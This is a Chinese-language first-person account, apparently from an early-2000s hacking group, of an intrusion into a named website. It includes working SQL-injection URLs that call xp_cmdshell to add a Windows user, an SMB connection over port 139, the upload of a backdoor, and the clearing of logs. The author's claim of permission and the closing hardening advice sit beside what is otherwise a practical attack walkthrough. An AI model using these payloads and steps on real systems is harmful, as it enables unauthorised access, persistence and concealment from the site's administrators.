一次完整的入侵检测

在绿盟的漏洞资料里查到这个漏洞存在着越界查看漏洞，就是说能够查看任意文档。可是。。。。因为不知道具体路进，都没成功，而且他的web站点放在了D盘，所以没有成功（事后知道的）。CGI啊CGI为什么我老不行呢？不相信，随后去了绿盟找了点EXPilot，编译后进行探测攻击，X，失败告终。。
难道非要我从论坛入手？？？我偏不要。冷静下来后我决定再次看看网页，随后又找了扫描器老大哥SSS进行扫描。
在观察网页种，无疑进入了下载页面，看来还没做好。无疑间我点了回首页的连接，晕，卡住了，看看连接地址，晕，file://d:/defual.asp 百密必有一疏，看到路径了，可。。。。两个盘符，跨盘符似乎没提到，不管了，先试试吧，10分钟过去，依然不行，看来又走不通了。看看肉鸡的SSS扫描结果，老大哥就是老大哥，没话说，对于CGI的准确性很厉害，那些漏洞虽然扫出来了，但前面有个X说明是个幌子，但是有一个，查找资料。绿盟竟然没有？？那去google看看，找到几个，看了看漏洞介绍，针对iis4.0的，晕，白开心了，那怎么入手呢？？？？
看了看时间，2点了，明天上课，所以今天倒此了，但是目的达到了，毕竟今天的任务是踩点。睡觉先。

第二天，晚上9点，呵呵，精神来了，继续昨天的排演。本来今天想整理下资料看看的，可还是不死心，又开始了扫描，结果相同。
刚想起来是有MSsql数据库的，找找最新的资料，看到MYSQL有溢出漏洞，编译了攻击程式，试验了下，结果是，失败：（ 看看网页吧。
找到一个网管信箱，看看。。。。。。。是webclint邮件服务器，看看版本，晕，6.8的，我记得的漏洞是2.4的，看来又不行了，诶，真不甘心。看看文章系统吧，总觉得是免费的文章系统，但是是利用SQL数据库的。先看看他的查询：
http://www.inday.com/gunye.asp?boardID=5
http://www.inday.com/news.asp?boardID=2
下面都雷同，只是asp页不同，关键语句是boardID，使用的查询语句可能是
"select * from where boardid="&boardid&"……
后面我就猜不到了，再看看新闻页面
http://www.inday.com/ShowAnnounce.asp?boardID=2&RootID=1194&ID=1194&tion=7
标准的新闻系统，呵呵，那我们来44SQL 注入攻击看看。注意，SQL注入问题很严重，请大家不要乱用下面的演示。相关资料网上已有很多了，这里不再介绍。
我使用了http://www.inday.com/news.asp?boardID=2;exec;sp_addlogin RHC进行查看，返回了语法错误，我再继续
http://www.inday.com/news.asp?boardID=2;exec;sp_addlogin hax--，返回
ADODB.Recordset 错误 '800a0cb3'
当前记录集不支持书签。这可能是提供程式或选定的游标类型的限制。
/news.asp，行358
成功，yeah～～～～～～～～兴奋中！！！
然后我就一步一步添加了一个用户。哦，对了，还没说这个漏洞呢，这个漏洞是针对ASP SQL的，一些asp页面没有进行过滤，使攻击者能执行任意命令，很简单，SQL我想大家都知道吧，假如得到用户密码就等于知道了这台主机的控制权。那我在SQL里创建一个本地用户没有问题吧，好我们来创建。以下程式很危险，请勿试。这里提一下，后面的—是SQL语句的注释，那后面的语句就不起作用了，嘿嘿。
http://www.inday.com/news.asp?id=2;exec master.dbo.sp_addlogin RHC;--
http://www.inday.com/news.asp?id=2;exec master.dbo.sp_password RHC,www.realhack.org;--
http://www.inday.com/news.asp?id=2;exec master.dbo.xp_cmdshell 'net user RHC www.realhack.org /workstations:* /times:all/passwordchg:yes /passwordreq:yes /active:yes /add';--
哈哈，创建了一个RHC用户，密码为www.realhack.org。现在那个3389就能够用了，打开终端连接器，输入用户名和密码，OK，进入。。进入。。。进入。。。。。。。！！！！终端已超过最大连接数。。。。。狂晕！！

这时候我们的目的基本达到了，该是清理战场，然后写报告的时候了。既然3389不能进，但是139还开着，OK，net use 上去，我传了朋友做的一个后门程式，然后看了看他们的配置和web的存放位置，和我猜的没错，采用分盘管理。很严谨。在C盘，意外看见了w2ksp3补丁 ，看来先前的失败是有原因的。好了，清理日记，留了个页面告诉了我朋友一声。

总结：
这次入侵一开始没有走对路线，一直以为什么补丁都没打，害的我走了很多弯路，在2天里找了很多溢出程式，但都一一失败。在中间我还使用了flashget的站点资源探测工具得到了很有用的信息，站点的结构我都是从哪里得知的。其实一开始不想用SQL 注入问题来进行入侵的，但这次是安全检测，当然要全面些，所以用了最新搞到的资料。而且此问题只在ASP SQL的服务器上才会有，一般的虚拟空间是不存在的。此问题相当严重，请不要随意破坏！！！国内主机！！！！我是得到入侵许可的情况下进行的攻击，假如使用上述方法进行破坏，本人不承担任何责任。
对于服务器的安全我也来说说，从一开始的扫描，我就认为他们的主机有问题（结果不是主机问题），一些不必要的端口开了，比如139，445，135等高危险端口都打开了，这是不应该的，至少也要进行防火墙的端口过滤吧。比如139，成了我成功的关键，因为在终端连接上不允许我连接，假如139没有开的话我可能还会费一些时日。其实问题不止一处，一些有问题的网页不应该放在主页上，比如上述说道的下载页面，完万能够让别人猜到路径，要知道物理路径对于一个攻击者来说是很重要的。现在最严重，谈论最多的莫过于SQL注入问题了，入侵的时候我把isno的SQL注入问题读了好几遍，高手就是高手，不像我这样的烂文章。后来我把他们的文章系统看了看，查询语句根本不存在任何过滤，使我感到很惊讶，听朋友说这个文章系统是花钱请专门的人修改一个免费文章系统的，竟然一点常识都没有，真是可悲。虽然SQL问题已公开很久了，可是国内很多网站都存在问题，动网的洞一个接一个，LB的洞又接踵而来，真是令人发指啊。好了，就说到这里吧，有空能够到我们小组来看看，网址是：http://www.realhack.org